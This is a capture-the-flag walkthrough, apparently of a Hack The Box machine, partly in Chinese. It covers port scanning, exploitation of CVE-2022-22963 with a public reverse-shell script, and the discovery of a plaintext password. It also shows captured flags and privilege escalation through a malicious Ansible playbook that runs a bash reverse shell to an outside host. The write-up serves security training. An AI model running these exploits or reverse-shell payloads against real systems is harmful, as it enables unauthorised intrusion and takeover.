Information Gathering
IP AddressOpening Ports10.10.11.204TCP:22,8080 $ ip='10.10.11.204'; itf='tun0'; if nmap -Pn -sn "$ip" | grep -q "Host is up"; then echo -e "\e[32m[+] Target $ip is up, scanning ports...\e[0m"; ports=$(sudo masscan -p1-65535,U:1-65535 "$ip" --rate=1000 -e "$itf" | awk '/open/ {print $4}' | cut -d '/' -f1 | sort -n | tr '\n' ',' | sed 's/,$//'); if [ -n "$ports" ]; then echo -e "\e[34m[+] Open ports found on $ip: $ports\e[0m"; nmap -Pn -sV -sC -p "$ports" "$ip"; else echo -e "\e[31m[!] No open ports found on $ip.\e[0m"; fi; else echo -e "\e[31m[!] Target $ip is unreachable, network is down.\e[0m"; fi
- PORT STATE SERVICE VERSION
- 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
- | ssh-hostkey:
- | 3072 caf10c515a596277f0a80c5c7c8ddaf8 (RSA)
- | 256 d51c81c97b076b1cc1b429254b52219f (ECDSA)
- |_ 256 db1d8ceb9472b0d3ed44b96c93a7f91d (ED25519)
- 8080/tcp open nagios-nsca Nagios NSCA
- |_http-title: Home
- Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
http://10.10.11.204:8080
$ feroxbuster -u 'http://10.10.11.204:8080/'
http://10.10.11.204:8080/upload
https://www.cvedetails.com/cve/CVE-2022-22963/
https://github.com/J0ey17/CVE-2022-22963_Reverse-Shell-Exploit
$ python3 exp.py -u 'http://10.10.11.204:8080'
https://github.com/MartinxMax/trp00f
$ grep -iR password 2>/dev/null
Username:phil
Passowrd ocPhillovestoInject123
User.txt
94e7dcdca61b2d4d6d8256039e213074
Privilege Escalation:Ansible playbook
通过pspy64监控,得到/usr/local/bin/ansible-parallel执行了/opt/automation/tasks/*.yml任务
playbook_1.yml 文件是一个 Ansible Playbook,它的作用是确保 webapp 服务在本地(localhost)运行,并设置为开机自启。
编写恶意yml载荷到
/opt/automation/tasks/playbook_2.yml
- - hosts: localhost
- tasks:
- - name: Checking webapp service
- shell: bash -c 'bash -i >& /dev/tcp/10.10.16.28/443 0>&1'
Root.txt
5e375fdba1d1771e97cf1af837801f0e
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。 |
